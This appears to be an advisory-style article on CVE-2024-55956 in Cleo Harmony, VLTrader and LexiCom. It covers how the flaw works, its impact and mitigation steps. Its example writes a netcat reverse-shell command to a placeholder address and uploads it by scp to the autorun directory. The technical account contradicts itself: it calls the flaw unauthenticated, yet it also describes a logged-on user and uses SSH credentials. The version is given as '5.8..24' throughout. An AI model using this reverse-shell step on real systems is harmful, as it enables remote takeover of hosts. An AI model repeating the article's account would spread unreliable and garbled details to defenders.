CVE-2024-55956: Critical Vulnerability in Cleo Harmony, VLTrader, and LexiCom Allowing Unauthenticated Users to Import and Execute Arbitrary Bash or PowerShell Commands

⚠️ ATTENTION: A critical vulnerability in Cleo Harmony before 5.8..24, VLTrader before 5.8..24, and LexiCom before 5.8..24 allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the host system. This article covers the details of the exploit and offers mitigation tips to help keep your devices safe.

What is CVE-2024-55956?

CVE-2024-55956 is a critical vulnerability that affects Cleo Harmony, VLTrader, and LexiCom, with versions before 5.8..24. This vulnerability stems from the default Autorun directory settings, which can be exploited by an unauthenticated user to import and execute arbitrary Bash or PowerShell commands on the host system.

How does the exploit work?

The vulnerability exists due to an insecure configuration in the Autorun directory settings. The autorun.cfg file on the affected systems grants full control over the Autorun directory to a logged-on user. This allows an attacker to import and execute arbitrary Bash or PowerShell commands without any authentication.

Consider the following code snippet that demonstrates this exploit

echo "nc -e /bin/bash 'ip_address' 'port'" > exploit.sh
scp -i id_rsa exploit.sh user@host:/path/to/autorun_dir/

In this example, the exploit uses scp to transfer the exploit script (exploit.sh) containing the arbitrary commands, utilizing the default Autorun directory location (/path/to/autorun_dir/) and the user's credentials. Once the script is uploaded, it will be executed automatically, giving the attacker a reverse shell connection and complete control over the host system.

Impact of the vulnerability

This vulnerability poses a significant risk to businesses and individuals using the affected Cleo Harmony, VLTrader, and LexiCom versions. A successful exploitation by an attacker could lead to full compromise of the host system and unauthorized access to sensitive data.

To mitigate this vulnerability and protect your system

1. Update to the latest version: Upgrade Cleo Harmony, VLTrader, and LexiCom to version 5.8..24 or later to patch the vulnerability. Check the official product websites for the latest available versions:
- Cleo Harmony
- VLTrader
- LexiCom
2. Change default settings: Modify the default settings of the Autorun directory to remove full control permissions for logged-on users. This can be done by editing the autorun.cfg file on your system and adjusting the permission settings.
3. Implement stricter access control: Limit the number of users who can log in to your system and ensure that only authorized personnel have access to sensitive areas, such as the Autorun directory.
4. Monitor network activity: Regularly monitor your network traffic and server logs to detect signs of unauthorized access or suspicious activity.

Stay vigilant and keep your systems up-to-date to protect your infrastructure from CVE-2024-55956 and other critical vulnerabilities. Remember, security is a continuous process, not a one-time effort.

Timeline

Published on: 12/13/2024 21:15:13 UTC
Last modified on: 12/16/2024 18:15:12 UTC